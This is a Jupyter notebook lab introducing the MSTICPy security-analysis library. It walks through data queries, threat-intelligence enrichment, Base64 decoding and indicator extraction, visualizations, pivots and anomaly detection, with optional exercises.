# MSTICPy Lab

This lab provides an interactive introduction to MSTICPy and its core features. It uses local datasets to provide a repeatable experience, however this follows the same pattern as if you were using data from a remote data store via one of MSTICPy's [Data Providers](https://msticpy.readthedocs.io/en/latest/data_acquisition/DataProviders.html)<br>


If you require more information during this lab more details can be found in the [MSTICPy documentation](https://msticpy.readthedocs.io/en/latest/).

## How to use this lab

The lab contains a number of interactive code examples as well as exercises to be completed. The exercises are entirely optional and can be skipped if wanted, however they provide a useful way to learn about using some of the core features of MSTICPy.<br>

To use the notebook simply select each cell below and either click the run cell button at the top or alternatively use the keyboard shortcut of Ctrl+Enter to execute each cell. Many cells will use the output of previous cells so its strongly recommended that cells be run in order.<br>

<div class="alert alert-block alert-info">
    <b>Note:</b> not all cells will have an output, do not be surprised if you do not see anything appear under a cell after running it. Also, some cells may take a while to run so please be a bit patient. For more help on running Jupyter notebooks please refer to <a href="https://jupyter.readthedocs.io/en/latest/running.html">this documentation.</a>
</div>

If you get stuck with any of the exercises in this lab you can check your answers in the [completed notebook here](https://github.com/microsoft/msticpy-lab/blob/main/MSTICPy_Lab_Completed.ipynb).<br>

In several places this notebook uses lookups to the external threat intelligence provider [GreyNoise](https://GreyNoise.io/). As this is an online service you may get different responses as that data is updated. Do not be surprised if you get no positive results when running the sections of this notebook where threat intelligence is used.

## Setup

MSTICpy includes a feature called [nbinit](https://msticpy.readthedocs.io/en/latest/msticpy.nbtools.html?highlight=nbinit#module-msticpy.nbtools.nbinit) that handles the process of installing and importing modules into a notebook environment. This was developed to allow for a clearer starting cell in notebooks and to avoid users being presented with a very large cell block at the top of a notebook.<br>

By passing the notebook namespace to init_notebook() this function handles the job of installing and importing core MSTICpy packages along with any others that might be needed by a notebook. When running this cell you may see some warnings - **this is to be expected and will not affect the rest of the lab** - they are simply show as we are not using a completed configuration in this scenario.

<div class="alert alert-block alert-info">
<b>Note:</b> When running this cell you may see some warnings - <b>this is to be expected and will not affect the rest of the lab</b> - they are simply show as we are not using a completed configuration in this scenario.
</div>

You must have msticpy installed to run this notebook (if using binder this lab has the package pre-installed for you):
```
!pip install --upgrade msticpy[timeseries, splunk, azsentinel]
```
MSTICpy versions > 1.0.1

The notebook also uses MSTIC Notebooklets (again pre-installed if using binder):
```
!pip install --upgrade msticnb
```

In [None]:
from msticpy.nbtools import nbinit
nbinit.init_notebook(
    namespace=globals()
)

ti = TILookup()

In [None]:
# We also need to load a couple of anwsers for one of the exercises (no peeking!)
import json

with open("data/answers.json") as f:
    answers = json.load(f)

## Data Acquisition
The starting point for many security analysis notebooks is ingesting data to conduct analysis or investigation of. MSTICpy has a number of [query providers](https://msticpy.readthedocs.io/en/latest/data_acquisition/DataProviders.html) to allow users to query and return data from a number of sources. Below we are using the Local Data query provider to return data from local files. This is useful for this lab but is also useful if analysis is relying on local data rather than a 'live' data source.<br> 

In order to provide a common interface layer between data and features in MSTICPy all data is returned in a Pandas [DataFrame](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.html) DataFrame. As well as providing a consistent framework for other features to user it also allows for easy manipulation and analysis of the returned data using Pandas numerous features.

The first step in using a query provider is to initialize a `QueryProvider` and pass it the type of provider you want to use. Depending on the provider type you can also pass other required parameters. In the cell below we create a LocalData provider and pass it the location of where are local data files and their definitions are stored.<br>

Each provider contains a series of built-in queries. These are pre-defined queries that return a specific subset of data, for our LocalData provider this is a specific file, however for a 'live' data source such as Azure Sentinel these will execute queries against that data source and return the results.<br>

Once the query provider has been created we can use the `browse_queries` feature to interactively view the available queries.

In [None]:
# We start by loading a query provider for our `LocalData` source.
qry_prov = QueryProvider(data_environment="LocalData", data_paths=["./data"], query_paths=["./data"])
# We can then look at the queries built into a provider by default
qry_prov.browse_queries()

------------------------

Once a query has been selected you call it directly with `qry_prov.{query_group}.{query_name}` . You can also pass extra parameters to these queries where they have configurable elements (often things such as timeframes and specific entities to search for). In addition the query providers also allow you to execute a query defined as a string by calling `qry_prov.exec_query(QUERY_STRING)`<br>

The returned dataframe contains the query results and can be displayed and interacted with as with any other Pandas dataframe.

In [None]:
events = qry_prov.WindowsSecurity.list_host_events()
events.head()

<div class="alert alert-block alert-success">
<h3>Lab Exercise 1</h3>
In the cell below write code that uses the query provider created above (`qry_prov`) to get data relating to security alerts using a built-in query. You can use the query browser above to find the most suitable query to run.

<details>
    <summary>Hint:</summary>
    Queries relating to security alerts are part of the SecurityAlert query type.
</details>
</div>

In [None]:
# Get security alert data

## Enrich Data
A key analysis step for security analysts is to take a dataset, extract relevant elements and enrich it with another dataset to help filter it.
A common example of this is taking IP addresses in log data and seeing if any of them appear in threat intelligence data.<br>

In the cells below we use MSTICPy's query provider to get sign in event data, and then look up the IPs those sign-ins have come from against a threat intelligence provider's API using the [MSTICPy threat intelligence](https://msticpy.readthedocs.io/en/latest/data_acquisition/TIProviders.html) features. In this case we are using the [GreyNoise](https://greynoise.io/) provider.

In [None]:
# First we are going to use a built in query to get all of our signin data from our Windows host
data = qry_prov.WindowsSecurity.list_host_logons()
data.head()

MSTICPy includes a [Threat Intelligence (TI) lookup provider](https://msticpy.readthedocs.io/en/latest/data_acquisition/TIProviders.html) `TILookup` that allows for key indicators to be searched for in various different services. The provider can be configured to use a range of different providers, and queries can be specifically targeted at a provider if required.
MSTICPY current supports the following providers:
- VirusTotal
- AlienVault OTX
- IBM XForce
- GreyNoise
- Azure Sentinel Threat Intelligence

There is also support via the TI lookup provider to get the [Open Page Rank](https://www.domcop.com/openpagerank/what-is-openpagerank#:~:text=What%20Is%20Open%20PageRank%3F%20The%20Open%20PageRank%20initiative,has%20been%20collected%20over%20the%20last%207%20years) for a domain, and determine if an IP address is a [ToR]( https://www.torproject.org/) exit node.<br>

When instantiating a TI provider you can define the providers you want it to load, or you can let it search for a [MSTICPy config file](https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html) and take configuration from there - this is the approach we are taking in this lab.

In [None]:
# Next we need to load our TI providers
ti = TILookup()

`.loaded_providers` shows which providers have been loaded by the TI lookup provider.

In [None]:
# For this lab we are just using the GreyNoise provider
ti.loaded_providers

Once loaded you can use `lookup_ioc` to look up a single indicator, or `lookup_iocs` to look up every value in a dataframe column.<br>

In this example we want to look up every IP address in our results dataframe, so we are going to use `lookup_iocs`, tell it to look up values in the "IpAddress" column, and use the GreyNoise service to do the lookups.<br>

Once we have results you can either display the results statically or use `browse_results` to get an interactive view of the results.

In [None]:
# Here we lookup each of the IP addresses in our dataset
results = ti.lookup_iocs(data, obs_col="IpAddress", providers=['GreyNoise'])
ti_browser.browse_results(results, severities=['information', 'warning', 'high'])

<div class="alert alert-block alert-success">
<h3>Lab Exercise 2</h3>
Now that you have seen how to return and enrich data, complete the code in the following two cells to get a list of Azure AD sign in events and look up the origin IP addresses against threat intelligence.<br>

Additional documentation on the threat intelligence provider can be found [here](https://msticpy.readthedocs.io/en/latest/data_acquisition/TIProviders.html)

<details>
    <summary>Hint:</summary>
    <ul>
        <li>Remember to pass `obs_col="IPAddress"` to `lookup_iocs` to get lookups on the correct column</li>
        <li>You can reuse the TI provider assigned to `ti` in the cells above</li>
    </ul>
</details>
</div>
    


In [None]:
# Use the query provider qry_prov to get Azure signin data with the list_all_signins_geo query


In [None]:
# Lookup the IP addresses in the IPAddress column using the GreyNoise TI provider


## Extracting key data
Often when working with security related data the indicators you need are not as readily available as they were in the example above. Often, they can be encoded or otherwise obscured from human analysis. MSTICPy also includes tooling to help security analysts quickly decode this data for further analysis.<br>

In this section we are going to query our datasets for command line data, decode any Base64 encoding in the command lines using the [`base64` feature](https://msticpy.readthedocs.io/en/latest/data_analysis/Base64Unpack.html), and then extract known indicator types (such as IP addresses and domain names) from that data using the [`IoCExtract` feature](https://msticpy.readthedocs.io/en/latest/data_analysis/IoCExtract.html).

In [None]:
# Load command line data set
cmdl_data = qry_prov.WindowsSecurity.list_host_processes()
cmdl_data.head()

Now that we have some data, we can call `base64.unpack_df` and tell it to unpack data found in the 'CommandLine' column. This feature will look for Base64 patterns in that column, attempt to unpack any it finds and present us with the decoded output.<br>

`base64.unpack_df` provides an output of just elements relevant to the decoded string, to get some context on where this string was found we next join it back to the original dataset so that we can see the log event and the decoded string in the same dataset.

In [None]:
# Base64 decode
b64df = base64.unpack_df(data=cmdl_data.head(1000), column='CommandLine')
b64df['SourceIndex'] = pd.to_numeric(b64df['src_index'])
merged_df = (cmdl_data
             .merge(right=b64df, how='left', left_index=True, right_on='SourceIndex')
             #.drop(columns=['Unnamed: 0'])
             .set_index('SourceIndex'))

# Show the result of the merge (only those rows that have a value in original_string)
merged_filtered = merged_df.dropna(subset=['decoded_string'])[["TimeGenerated", "Account", "Computer", "NewProcessName", "CommandLine_x", "decoded_string"]]
merged_filtered

Now that we have the decoded string, we can look for any Indicators of Compromise (IoCs) in these strings. Using [MSTICPy's `IoCExtract`](https://msticpy.readthedocs.io/en/latest/data_analysis/IoCExtract.html) we can search all of these decoded strings for things such as IP addresses, file hashes and URLs. You can choose to search specific indicator types by passing the `ioc_types` parameter but we want to just search for everything.<br>

MSTICPy has a set of common IoC patterns to search for and extract but you can also extend this by adding your own regex patterns with `add_ioc_type`.

In [None]:
# Extract IoCs
ioc_extractor = IoCExtract()
ioc_df = ioc_extractor.extract(data=merged_filtered, columns=['decoded_string'])
ioc_df

We can also use `domain_utils` to get some other information on the domain, such as what IP addresses it resolves to.

In [None]:
from msticpy.sectools.domain_utils import dns_resolve
dns_info = dns_resolve(ioc_df.iloc[0]['Observable'])
display(dns_info)

<div class="alert alert-block alert-success">
    <h3>Lab Exercise 4</h3>
Syslog data is a common data source during security analysis. The syslog data structure includes a lot of key information in a single field that can make extraction complicated. <br>
In this exercise you will load syslog data and extract indicators from the Message field.<br>

**Bonus Task**:<br>
Identify the Base64 encoded syslog messages and extract indicators from those as well.

<details>
    <summary>Hint:</summary>
    <ul>
        <li>Syslog data is found under the LinuxSyslog type of queries</li>
        <li>Core syslog data is stored in the SyslogMessage column</li>
    </ul>
</details>
</div>

In [None]:
# Load syslog data


In [None]:
# Extract URL indicators from the SyslogMessage column and get a unique list of indicators found


In [None]:
# Decode Base64 data and extract indicators

# get a list of decoded strings

# Extract dns indicators from these strings (use the full_decoded_string column)


## Data Visualization
Data visualization is a key tool in any data analyis scenario and the same is true during security analysis. MSTICPy contains a number of visualizations, below we will plot locations on a map to help identify anomalous logon locations, showing a graph of security alerts, and plotting a process tree showing process executions on a host.<br>

*MSTICpy uses [Bokeh](https://bokeh.org/) and [Folium](https://python-visualization.github.io/folium/#) to power its visualization features.*

The first thing we need to do is get some data to plot. Here we will use Azure AD signin events. These events include the location the login occured from allowing us to easily plot them on a map for geospatial analysis.

In [None]:
# Plot IP geolocation on a map
loc_data = qry_prov.Azure.list_all_signins_geo()
loc_data.head()

Before we can plot the data we need to format the raw data into a known format. MSTICPy has a number of [defined entities](https://msticpy.readthedocs.io/en/latest/msticpy.datamodel.html?highlight=entitie), one of which is `Ip`. The entity has a location property, so by mapping the columns in our data to the properties of these entities we can easily format the whole dataset in a series of entities.

From there we can then use MSTICPy's [`FoliumMap`](https://msticpy.readthedocs.io/en/latest/visualization/FoliumMap.html) feature to plot these entities on a map.

In [None]:
ip_ents = []
def format_ips(row):
    ip_ent = entities.ip_address.Ip(Address=row['IPAddress'])
    loc = entities.GeoLocation(Longitude=float(row['Longitude']), Latitude=float(row['Latitude']))
    ip_ent.Location = loc
    ip_ents.append(ip_ent)
    
# Format dataset into entities
loc_data.apply(format_ips, axis=1)
# Create Map plot
folium_map = FoliumMap(zoom_start=2)
# Add IP entities to the map
folium_map.add_ip_cluster(ip_entities=ip_ents, color="blue")
# Center the map around the plotted entities
folium_map.center_map()
# Display the map
folium_map

Another useful visualization is a graph plot that shows connections between events. This is particularly useful when looking at data items such as alerts that contain a lot of embedded data such as affected hosts and users. By graph plotting alert data we can see the connections between them that might help a security analyst get a better understanding of an intrusion.

Using [`create_alert_graph`](https://msticpy.readthedocs.io/en/latest/msticpy.data.html?highlight=create_alert_graph#msticpy.nbtools.security_alert_graph.create_alert_graph) we can create a [NetworkX](https://networkx.org/) representation of a security alert, and link it to our other alerts. We then call [`draw_alert_entity_graph`](https://msticpy.readthedocs.io/en/latest/msticpy.nbtools.html?highlight=draw_alert_entity_graph#msticpy.nbtools.nbdisplay.draw_alert_entity_graph) to display this.



In [None]:
# Security Alert Graph
alert_df = qry_prov.SecurityAlert.list_alerts()
# Create a Security Alert entity
alert = SecurityAlert(alert_df.iloc[0])
# Create a graph
grph = create_alert_graph(alert)
# Add other alerts to the graph
full_grph = add_related_alerts(alert_df, grph)
# Display the graph
nbdisplay.draw_alert_entity_graph(full_grph, width=15)

Another common visualization in security tooling is the process tree. This shows the hierarchical relationship of processes executed on a host.

MSTICPy has functions to both build and plot these process trees based off Windows process creation events. More details on these functions can be found [here](https://msticpy.readthedocs.io/en/latest/visualization/ProcessTree.html).

In [None]:
# Before plotting a process tree we need to get data related to process creation events
proc_df = qry_prov.WindowsSecurity.get_process_tree()
proc_df.head()

In [None]:
# We start by building the process tree
p_tree_win = ptree.build_process_tree(proc_df, schema=None, show_progress=False, debug=False)
# We then get then identify the root processes and their descendants
proc_tree = ptree.get_descendents(p_tree_win, ptree.get_roots(p_tree_win).iloc[0])
# we can then plot the process tree
nbdisplay.plot_process_tree(data=proc_tree, legend_col="SubjectUserName", show_table=True)

Temporal analaysis is another key tool in security investigation. Seeing in which order events occur, and how events cluster temporally can provide some invaluable insights. To help with this MSTICPy contains a flexible [timeline feature](https://msticpy.readthedocs.io/en/latest/visualization/EventTimeline.html) that allows for the plotting of a range of data on a timeline. You can plot simple single category discrete events, running values, and multi series events all in an interactive [Bokeh](https://bokeh.org/) visualization.

Using the timeline is as simple as passing a dataframe of data to `display_timeline`. By default this will use the TimeGenerated column for the time element, and a set of common column values to display when hovering over an event. These can be customized with the `time_column` and `source_columns` parameters (as used below).


In [None]:
# Get some data to plot
alert_df = qry_prov.SecurityAlert.list_alerts()
# Plot these values on a timeline based on when they were generated
nbdisplay.display_timeline(alert_df, source_columns=["AlertName"])

It's also possible to group events by a column to show them as separate rows in the timeline. This is done by passing the column you want to split on as `group_by` - below we are grouping by the alert severity.

There are also many other ways to customize this timeline. Please read the [full documentation](https://msticpy.readthedocs.io/en/latest/msticpy.nbtools.html#msticpy.nbtools.timeline.display_timeline) to see a list of options.

In [None]:
nbdisplay.display_timeline(alert_df, source_columns=["AlertName"], group_by="Severity")

<div class="alert alert-block alert-success">
    <h3>Lab Exercise 5</h3>
    In this lab you are going to plot your own timeline of events.<br>
    The timeline show plot Windows Host Logon events (.WindowsSecurity.list_host_logons).<br>
    You should group these by the logon type, and the hover over should show the user account logging in and what IP address they logged in from.
    
<details>
    <summary>Hint:</summary>
    <ul>
        <li>Grouping is passed with the 'group_by` parameter.</li>
        <li>Hover over values are set with the 'source_columns' parameter.</li>
    </ul>
</details>
</div>

In [None]:
# Load data


# Plot the timeline



## Pivots in MSTICPy

MSTICPy has a lot of functionality distributed across many classes and modules. However, there is no simple way to discover where these functions are and what types of data the function is relevant to.

[Pivot functions](https://msticpy.readthedocs.io/en/latest/data_analysis/PivotFunctions.html) bring this functionality together grouped around Entities. Entities are representations of real-world objects found commonly in CyberSec investigations. Some examples are: IpAddress, Host, Account, URL.

In the following cells we look at how pivot functions can be used to easily access MSTICPy functionality relevent to the indicator being investigated.

<div class="alert alert-block alert-warning">
<b>Note:</b> When you initialize the Pivot provider you will get a configuration error warning. This is not a problem (we are not using these features in this lab), we have included it to give you an example of the customized warnings in MSTICPy. These are designed to help users when running MSTICPy in notebooks, you can see that the error provides instructions and guidance to resolve issues (you don't have to resolve this one though!).
</div>

We first start by initalizing our Pivots:

In [None]:
from msticpy.datamodel.pivot import Pivot
Pivot(namespace=globals())

Once loaded we can take a look at the available Pivots.

<div class="alert alert-block alert-info">
<b>Note:</b> The available Pivots are based on the providers we have loaded so if you have additional providers loaded you will have more Pivots available to you.</div>



In [None]:
# Once loaded we can browse what pivots are available in an interactive widget
Pivot.browse()

To begin to Pivot we first need to get an entity to Pivot on. For this lab we are going to use an IP address entity, and once extracted our first Pivot will be to see what sort of IP address it is using as the `ip_type` Pivot.

In this example we are running the Pivot on a single indicator, however many Pivots also let you apply them to an entire dataframe (you will see this in the next Pivot example).

In [None]:
# Get an IP Address to pivot on
ip_df =  qry_prov.Network.list_azure_network_flows_by_ip()
ip = ip_df.iloc[0]['VMIPAddress']
# See what type of IP address we are working with.
entities.IpAddress.util.ip_type(ip_str=ip)

As well as individual Pivots you can chain them together to perform several actions on a dataset.<br>
More information on [Pivots can be found in the MSTICPy documentation](https://msticpy.readthedocs.io/en/latest/data_analysis/PivotFunctions.html)

In the cell below we are taking a dataframe containing command line data addresses and applying a chain of Pivots to them.<br>
The chain in use does the following:<br>
<ul>
    <li>Extracts IoCs from the command lines in the data</li>
    <li>Filters to only logs that contained IoCs</li>
    <li>Further filters to where the IoCs were IP addresses</li>
    <li>Looks up those IP address in threat intelligence</li>
    <li>Filters to only those events where there was a match in threat intelligence</li>
</ul>

In [None]:
# Get some command line data
cmdl_data = qry_prov.LinuxSyslog.list_all_syslog_events()
# Extract IoCs from command lines
(cmdl_data.head(500)
     .mp_pivot.run(entities.Process.util.extract_iocs, column="SyslogMessage", join="left")
     # Filter where there were IoCs found
     .dropna(subset=["Observable"])
     # Filter to only IP IoCs
     .query("IoCType == 'ipv4'")
     # Lookup IoCs in threat intel
     .mp_pivot.run(entities.IpAddress.ti.lookup_ipv4_GreyNoise, column="Observable", join="left")
     # Filter to where the IPs were found in threat intel
     .query('Status != 404')
 )

<div class="alert alert-block alert-success">

<h3>Lab Exercise 6</h3>
Create your own pivot pipeline that does the following:<br>
<ul>
    <li>Takes the dataframe created for you (net_df)</li>
    <li>Gets the type of IP address and joins this to the data</li>
    <li>Selects only the Public IP addresses in the dataset</li>
    <li>Filters to only 100 events</li>
    <li>Looks up the IP addresses in threat intelligence feeds using GreyNoise</li>
    <li>Selects only the IP addresses where there is a match in threat intelligence</li>
</ul>

<details>
    <summary>Hint:</summary>
    <ul>
        <li>.head(100) will filter a Pandas dataframe to 100 rows</li>
        <li>when calling pivot.run the parameter join='left' can be used to join the resulting dataframe into the original dataframe</li>
        <li>Posting threat intel results from GreyNoise can be distinguished by the status not being 404</li>
    </ul>
</details>
</div>

In [None]:
net_df = qry_prov.Network.list_azure_network_flows_by_ip()
net_df['PublicIPs'] = net_df['PublicIPs'].str.strip("['']").str.replace("'", "").str.replace(" ", "").str.split(",")
net_df = net_df.assign(IPs=net_df['PublicIPs'].explode('IPs'))
net_df.dropna(subset=['IPs'], inplace=True)
# Create the pivot chain


## MSTICPy's ML Features

MSTICPy has a number of basic ML features to support simple analysis that is common in security investigaiton. In the following section we will look at two of those; timeseries analysis and clustering.

In order to effectively hunt in a dataset analysts need to focus on specific events of interest. Below we use MSTICpy's [time series analysis](https://msticpy.readthedocs.io/en/latest/msticpy.analysis.html?highlight=timeseries#module-msticpy.analysis.timeseries) machine learning capabilities to identify anomalies in our network traffic for further investigation.<br>
As well as computing anomalies we visualize the data so that we can more easily see where these anomalies present themselves.


In [None]:
# Import MSTICPy's timeseries specfic features
from msticpy.analysis.timeseries import timeseries_anomalies_stl
from msticpy.nbtools.timeseries import display_timeseries_anomolies

# Load some network data to apply our analysis to
stldemo = qry_prov.Network.get_network_summary()

# Conduct our timeseries analyis
output = timeseries_anomalies_stl(stldemo)

# Visualize the timeseries and any anomalies
display_timeseries_anomolies(data=output, y= 'TotalBytesSent')

<div class="alert alert-block alert-success">

<h3>Lab Exercise 7</h3>
Using the timeline above answer the following questions:

<details>
    <summary>Hint:</summary>
    <ul>
        <li>Hover over points on the timeline to see additional information</li>
    </ul>
</details>
</div>

In [None]:
import ipywidgets as widgets
md("On what date did the two network data anomalies occur?", "bold")
date = widgets.DatePicker(
    description='Pick a Date',
    disabled=False
)
display(date)

md("How many bytes were sent on at 2020-07-06 19:00?", "bold")
bytesa = widgets.Text(
    description='Answer:',
    disabled=False
)
display(bytesa)

In [None]:
if str(date.value) == answers['question1'] and bytesa.value ==  answers['question2']:
    md(f"Correct, the anomolies occured on {date.value} and {bytesa.value} bytes were transfered at 2020-07-06 19:00")    
else:
    md("One of your answers is incorrect please try again")

### Logon Sessions
Logon events are key to understanding any host based activity. We have previously used MSTICpy's [timeline feature](https://msticpy.readthedocs.io/en/latest/visualization/EventTimeline.html) to display value based data from our timeseries analayis. However, we can also use it to display multiple types of discrete data on the same timeline. This is particularly useful for Windows logon events where we plot different logon types (interactive, network, etc.) in different horizontal series.<br>
We can split the plot by simply providing it a column to split on, with the parameter `group_by`.

In [None]:
# Acquire data using a built in query
host_logons = qry_prov.WindowsSecurity.list_host_logons()

# Display timeline
tooltip_cols = ["TimeGenerated", "Account", "LogonType", 'TimeGenerated']
nbdisplay.display_timeline(data=host_logons, title="Host Logons", source_columns = tooltip_cols, group_by = "LogonType", height=200)

When presented with a large number of events such as we have here it's useful to cluster these into a more manageable number of groups. MSTICpy contains [clustering features](https://msticpy.readthedocs.io/en/latest/msticpy.sectools.html?highlight=cluster_events#msticpy.sectools.eventcluster.dbcluster_events) that can be used against a number of data types. Once clustering is complete we use another [widget](https://msticpy.readthedocs.io/en/latest/msticpy.nbtools.html?highlight=SelectItem#msticpy.nbtools.nbwidgets.SelectItem) to let the user select the cluster they want to focus on.

In [None]:
from msticpy.analysis.eventcluster import dbcluster_events, add_process_features, _string_score

# Get data and convert some values into numericals
logon_features = host_logons.copy()
logon_features["AccountNum"] = host_logons.apply(lambda x: _string_score(x.Account), axis=1)
logon_features["TargetUserNum"] = host_logons.apply(lambda x: _string_score(x.TargetUserName), axis=1)
logon_features["LogonHour"] = host_logons.apply(lambda x: x.TimeGenerated.hour, axis=1)

# run clustering
(clus_logons, _, _) = dbcluster_events(data=logon_features, time_column="TimeGenerated", cluster_columns=["AccountNum", "LogonType", "TargetUserNum"], max_cluster_distance=0.0001)

# Sort and format the clustering scores to group similar logon events into sessions
dist_logons = clus_logons.sort_values("TimeGenerated")[["TargetUserName", "TimeGenerated", "LastEventTime", "LogonType", "ClusterSize"]]
dist_logons = dist_logons.apply(lambda x: (
        f"{x.TargetUserName}:    "
        f"(logontype {x.LogonType})   "
        f"timerange: {x.TimeGenerated} - {x.LastEventTime}    "
        f"count: {x.ClusterSize}"
    ),
    axis=1,
)
# Extract the distinct sessions
dist_logons = {v: k for k, v in dist_logons.to_dict().items()}

def show_logon(idx):
    return nbdisplay.format_logon(pd.DataFrame(clus_logons.loc[idx]).T)

# Display the sessions in a selection widget for later use
logon_wgt = nbwidgets.SelectItem(description="Select logon cluster to examine", item_dict=dist_logons, action=show_logon,height="200px", width="100%", auto_display=True)

---

<h1 style="border: 1px solid;background-color: LightGray; padding: 10px">Summary</h1>

MSTICPy has many features, in the lab you have only just started to scratch the surface. We have many more features to explore.<br>
In addition MSTICPy is a work in progress and we are very open to contributions, improvements, feedback, and feature requests from the community.

<h1 style="border: 1px solid;background-color: LightGray; padding: 10px">Check out our Microsoft Learn TV session</h1>

Check out our one-hour live broadcast on Microsoft Learn TV on **May 20 at 1PM PT**,
where we’ll dive deep into MSTICPy and it’s many uses! Special focus on extending MSTICPy.

More details and save-the-date at https://aka.ms/thelaunchspacemsticpy.

---

<h1 style="border: 1px solid;background-color: LightGray; padding: 10px">Resources</h1>

MSTICPy Documentation - https://msticpy.readthedocs.io<br>
GitHub repo - https://github.com/microsoft/msticpy<br>
Blog - https://msticpy.medium.com<br>

Sample notebooks:
- https://github.com/microsoft/msticpy/tree/master/docs/notebooks
- https://github.com/Azure/Azure-Sentinel-Notebooks


<h1 style="border: 1px solid;background-color: LightGray; padding: 10px">Contacts</h1>

MSTICPy is built and maintained by:
<ul>
    <li>Ian Hellen</li>
    <li>Pete Bryan</li>
    <li>Ashwin Patil</li>
</ul>

If you have any questions please reach out to us on [GitHub](https://github.com/microsoft/msticpy) or at:<br>
Email - msticpy@microsoft.com<br>
Twitter - [@ianhellen Ian Hellen](https://twitter.com/ianhellen), [@MSSPete (Pete Bryan)](https://twitter.com/MSSPete), [@AshwinPatil (Ashwin Patil)](https://twitter.com/ashwinpatil)<br>
GitHub - [@ianhelle](https://github.com/ianhelle), [@PeteBryan](https://github.com/petebryan), [@Ashwin-Patil](https://github.com/ashwin-patil)<br>
LinkedIn - [@ianhellen](https://www.linkedin.com/in/ianhellen/), [@PeteBryan](https://www.linkedin.com/in/peter-bryan-77588473/), [@AshwinPatil](https://www.linkedin.com/in/ashwinrp/)